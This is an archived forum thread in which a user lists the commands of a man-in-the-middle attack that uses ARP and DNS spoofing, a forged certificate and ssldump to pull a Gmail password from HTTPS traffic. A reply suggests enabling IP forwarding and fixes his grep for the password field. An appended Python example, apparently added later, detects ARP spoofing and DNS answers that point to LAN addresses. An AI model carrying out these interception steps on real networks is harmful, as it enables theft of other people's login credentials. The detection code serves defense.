Thursday, May 24, 2012
How to decrypt SSL traffic using a MITM attack

John Doe
Member



Posts: 14
Location: Underneath your keyboard
Joined: 03.03.09
Rank:
Apprentice
Posted on 05-03-09 01:08
http://www.hackerscenter.com/index.php?/Video/General/How-to-decrypt-SSL-encrypted-traffic-using-a-man-in-the-middle-attack-Auditor.html

I've followed this step by step and have not had any luck capturing my own password. What might I be doing wrong?

Commands ran:

fragrouter -B1
arpspoof -t XX.XX.XX.XX XX.Router.IP.ADD
webmitm (made a cert)
dnsspoof

wireshark (and start recording everything)

On the victim machine, when I perform an nslookup on gmail, the IP address is from my local area network.

Secondly, on the victim machine, when I visit gmail.com over https, there is a warning about the fake certificate I issued using the attacker's rig.

Log in to my own account.

Switch back to the attacker's rig.

Save the captured packets.

Then I ran: ssldump -r capture -k webmitm.crt -d > out

Lastly: cat out | grep 'Passwd'

I get nothing, and I looked through the out file and it seems like I am recording the traffic that is for gmail.com, but I can't see my own password. Any ideas?

Thank you guys for any words of wisdom.


RE: How to decrypt SSL traffic using a MITM attack

Cracker_Jax
Member



Posts: 155
Location: USA
Joined: 11.12.07
Rank:
Elite
Posted on 06-03-09 05:46
More than one way to skin a cat.

No need for fragrouter:
echo "1" > /proc/sys/net/ipv4/ip_forward


And remember:

Lastly: cat out | grep 'Passwd'


Linux is case sensitive, and read the manual:

man grep



HaxLabs Pentest Lab
www.haxlabs.com
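
The two symptoms reported in the first post (a public hostname resolving to a LAN address, and traffic redirected through another host by ARP spoofing) are also what a defender can check for on the affected machine. The following is an added example, not part of the thread; the ARP table, hostnames and addresses are constructed sample data, and the function names are hypothetical.

```python
import ipaddress

# Constructed sample data (not from the thread): a host's ARP cache in
# Linux `ip neigh` style, and DNS answers observed for public hostnames.
ARP_TABLE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.168.1.40 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
"""
DNS_ANSWERS = {"mail.example.com": "192.168.1.23", "www.example.org": "93.184.216.34"}
GATEWAY = "192.168.1.1"


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh`-style lines, skipping entries without lladdr."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            table[fields[0]] = fields[fields.index("lladdr") + 1].lower()
    return table


def shared_mac_with_gateway(table, gateway):
    """IPs whose MAC equals the gateway's MAC: the cache state ARP spoofing leaves behind."""
    gw_mac = table.get(gateway)
    if gw_mac is None:
        return []
    return sorted(ip for ip, mac in table.items() if mac == gw_mac and ip != gateway)


def private_answers(answers):
    """Public hostnames that resolved to a private, loopback or link-local address."""
    flagged = {}
    for name, addr in answers.items():
        ip = ipaddress.ip_address(addr)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            flagged[name] = addr
    return flagged


if __name__ == "__main__":
    neigh = parse_neigh(ARP_TABLE)
    print("hosts sharing the gateway MAC:", shared_mac_with_gateway(neigh, GATEWAY))
    print("public names with LAN answers:", private_answers(DNS_ANSWERS))
```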